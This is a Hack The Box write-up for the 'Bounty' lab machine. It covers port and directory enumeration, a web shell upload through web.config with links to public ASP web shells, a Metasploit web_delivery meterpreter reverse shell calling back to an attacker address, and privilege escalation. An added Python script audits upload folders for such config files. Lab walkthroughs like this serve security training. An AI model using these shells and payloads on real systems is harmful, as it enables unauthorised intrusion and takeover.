Hack The Box: Bounty




Difficulty: Easy
Machine Creator: mrb3n
Tools Used:

NMAP
Gobuster
Metasploit

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with a simple NMAP scan to discover open ports and services.

nmap -A 10.10.10.93


GoBuster

Using Gobuster, we can perform a directory scan. This host is a Windows IIS server, so we add the .aspx and .html extensions.

gobuster -u http://10.10.10.93 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40 -x .aspx,.html



Remote Code Execution (RCE)




Webshell

Since we can upload a web.config file, we should be able to upload a web shell in the config file.

https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
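
From the defender's side, an upload folder should never hold a web.config at all. The following added example (not part of the original write-up) audits a folder for *.config files and flags handler sections or script delimiters inside them; the indicator list, function names and sample files are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Content that should never appear in a file a user uploaded (assumed indicator set).
INDICATORS = {
    "server-side script delimiter": re.compile(r"<%.*?%>", re.S),
    "handler mapping section": re.compile(r"<\s*(handlers|httpHandlers)\b", re.I),
    "request filtering override": re.compile(r"<\s*requestFiltering\b", re.I),
}

def _decode(data):
    # An XML config file may be UTF-16 encoded, so honour the BOM before matching.
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8-sig", errors="replace")

def audit_upload_dir(root):
    """Return {relative_path: [reasons]} for every *.config file under root."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() != ".config":
            continue
        text = _decode(path.read_bytes())
        reasons = ["config file in upload directory"]
        reasons += [name for name, rx in INDICATORS.items() if rx.search(text)]
        findings[path.relative_to(root).as_posix()] = reasons
    return findings

def demo():
    # Constructed, non-functional samples standing in for an upload folder.
    flagged = ('<configuration><system.webServer><handlers>'
               '<add name="constructed" path="*.example" verb="*" />'
               '</handlers></system.webServer></configuration>\n'
               '<!-- <% constructed placeholder %> -->')
    plain = "<configuration><system.webServer><handlers /></system.webServer></configuration>"
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "sub").mkdir()
        (base / "photo.jpg").write_bytes(b"\xff\xd8\xff constructed")
        (base / "web.config").write_text(flagged, encoding="utf-8")
        (base / "sub" / "Web.Config").write_bytes(plain.encode("utf-16"))
        return audit_upload_dir(base)

if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
```

Any hit is worth triage, since the presence of the file is itself the primary finding and the content indicators only rank it.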


Web Delivery Meterpreter Shell

We need to build our exploit from Metasploit using the web delivery script.

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.2
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.2
msf exploit(multi/script/web_delivery) > run

Meterpreter Shell


User.txt


Privilege Escalation

Now we need a SYSTEM-level session to get root.txt. We can use the local_exploit_suggester recon module in Metasploit.

msf > use post/multi/recon/local_exploit_suggester
msf > set session 2
msf > run

Privilege Escalation Exploit



Root.txt